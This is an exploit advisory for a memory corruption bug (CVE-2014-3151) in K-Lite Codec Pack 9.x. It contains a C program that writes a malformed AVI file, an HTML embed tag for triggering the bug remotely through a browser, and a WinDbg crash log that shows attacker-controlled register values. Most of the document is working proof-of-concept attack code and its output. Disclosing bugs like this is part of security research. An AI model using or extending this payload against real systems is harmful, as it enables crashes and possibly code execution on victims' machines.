K-Lite CODEC version 9.x Memory Corruption Vulnerability

# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability]
# Date: [2014/05/3]
# Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.codecguide.com]
# Software Link: [
http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328]
# Version: [version 9.x and prior]
# Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit]
# CVE : [CVE-2014-3151]
# Found by Piece Dumb Fuzzer

details:

K-lite codec version 9.x and prior to that are vulnerable to a memory
corruption vulnerability which allows remote attackers to execute arbitrary
code execution to control the remote system via a malformed AVI file format
.

Tested on "Windows Media player latest edition", Internet explorer, GOM
Player & KM player, Windows XP, 7 x64 & x86 .

--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger memory corruption :

#include<stdio.h>
#include<stdlib.h>
#include<windows.h>

unsigned char sc[154] =
{
    0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20,
0x4C, 0x49, 0x53, 0x54,
    0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E,
0xFC, 0xFF, 0xFF, 0xFF,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
} ;
int main(int argc, char *argv[])
{
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;
    fileHandle =
CreateFile("d:\\poc.AVI",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
    if(fileHandle == INVALID_HANDLE_VALUE)
    {
        printf("(-)Failed to Create File");
        exit(0);
    }else{
         printf("(+) Writing File ...");
         WriteFile(fileHandle,sc,154,&dwBytesWritten,NULL);
    }
    CloseHandle(fileHandle);
    return 0;
}


--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to Remote trigger memory corruption :


<embed type="application/x-mplayer2" pluginspage="
http://www.microsoft.com/Windows/MediaPlayer/"
name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false"
autostart="false"
height="330" width="360" loop="false" src="D:/PoC.avi" />



windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 01000000 01013000   C:\Program Files\Windows Media
Player\wmplayer.exe
ModLoad: 7c900000 7c9b2000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 12950000 133b5000   C:\WINDOWS\system32\wmp.dll
ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 75a70000 75a91000   C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 59a60000 59b01000   C:\WINDOWS\system32\dbghelp.dll
ModLoad: 13740000 13f1b000   C:\WINDOWS\system32\wmploc.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 00ba0000 00e65000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 4ec50000 4edf6000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 63380000 63434000   C:\WINDOWS\system32\jscript.dll
ModLoad: 7e720000 7e7d0000   C:\WINDOWS\system32\SXS.DLL
ModLoad: 0d780000 0d7be000   C:\Program Files\Windows Media Player\mpvis.dll
ModLoad: 63000000 630e6000   C:\WINDOWS\system32\WININET.dll
ModLoad: 01400000 01409000   C:\WINDOWS\system32\Normaliz.dll
ModLoad: 1a400000 1a532000   C:\WINDOWS\system32\urlmon.dll
ModLoad: 5dca0000 5de88000   C:\WINDOWS\system32\iertutil.dll
ModLoad: 15110000 1536c000   C:\WINDOWS\system32\wmvcore.dll
ModLoad: 11c70000 11caa000   C:\WINDOWS\system32\WMASF.DLL
ModLoad: 76380000 76385000   C:\WINDOWS\system32\MSIMG32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 77690000 776b1000   C:\WINDOWS\system32\NTMARTA.DLL
ModLoad: 71bf0000 71c03000   C:\WINDOWS\system32\SAMLIB.dll
ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 0bef0000 0bf27000   C:\WINDOWS\system32\MFPlat.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 61da0000 61db0000   C:\WINDOWS\system32\mcicda.dll
ModLoad: 0e510000 0e562000   C:\WINDOWS\system32\mswmdm.dll
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\USERENV.dll
ModLoad: 5b860000 5b8b6000   C:\WINDOWS\system32\netapi32.dll
ModLoad: 0dfb0000 0dfe9000   C:\WINDOWS\system32\mspmsp.dll
ModLoad: 07940000 0797b000   C:\WINDOWS\system32\cewmdm.dll
ModLoad: 11d10000 11d1d000   C:\WINDOWS\system32\wmdmps.dll
ModLoad: 62bf0000 62c22000   C:\WINDOWS\system32\upnphost.dll
ModLoad: 4d4f0000 4d549000   C:\WINDOWS\system32\WINHTTP.dll
ModLoad: 74f00000 74f0c000   C:\WINDOWS\system32\SSDPAPI.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 13fe0000 14014000   C:\Program Files\Windows Media
Player\wmpnssci.dll
ModLoad: 109c0000 109ec000   C:\WINDOWS\system32\PortableDeviceTypes.dll
ModLoad: 10930000 10979000   C:\WINDOWS\system32\PortableDeviceApi.dll
ModLoad: 0e020000 0e089000   C:\WINDOWS\system32\MSSCP.dll
ModLoad: 75cf0000 75d81000   C:\WINDOWS\system32\mlang.dll
ModLoad: 08b70000 08c65000   C:\WINDOWS\system32\drmv2clt.dll
ModLoad: 76ee0000 76f1c000   C:\WINDOWS\system32\RASAPI32.dll
ModLoad: 76e90000 76ea2000   C:\WINDOWS\system32\rasman.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
ModLoad: 77c70000 77c94000   C:\WINDOWS\system32\msv1_0.dll
ModLoad: 722b0000 722b5000   C:\WINDOWS\system32\sensapi.dll
ModLoad: 14030000 14054000   C:\WINDOWS\system32\wmpps.dll
ModLoad: 71a50000 71a8f000   C:\WINDOWS\system32\mswsock.dll
ModLoad: 662b0000 66308000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 76fc0000 76fc6000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 76f20000 76f47000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 10000000 10008000   C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
ModLoad: 5cb00000 5cb6e000   C:\WINDOWS\system32\shimgvw.dll
ModLoad: 38a70000 38a7c000
C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
ModLoad: 78130000 781cb000
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll
ModLoad: 74810000 7497d000   C:\WINDOWS\system32\quartz.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 02f30000 02f9e000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f753000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6aac0000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f581000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 02c00000 02c32000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\libbluray.dll
ModLoad: 02fe0000 03176000   C:\Program Files\K-Lite Codec
Pack\Filters\vsfilter.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000   C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000   C:\Program Files\Common Files\Roxio
Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240
edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0         nv up ei pl zr na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39            mov     edi,dword ptr [ecx]
ds:0023:41414141=????????



//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information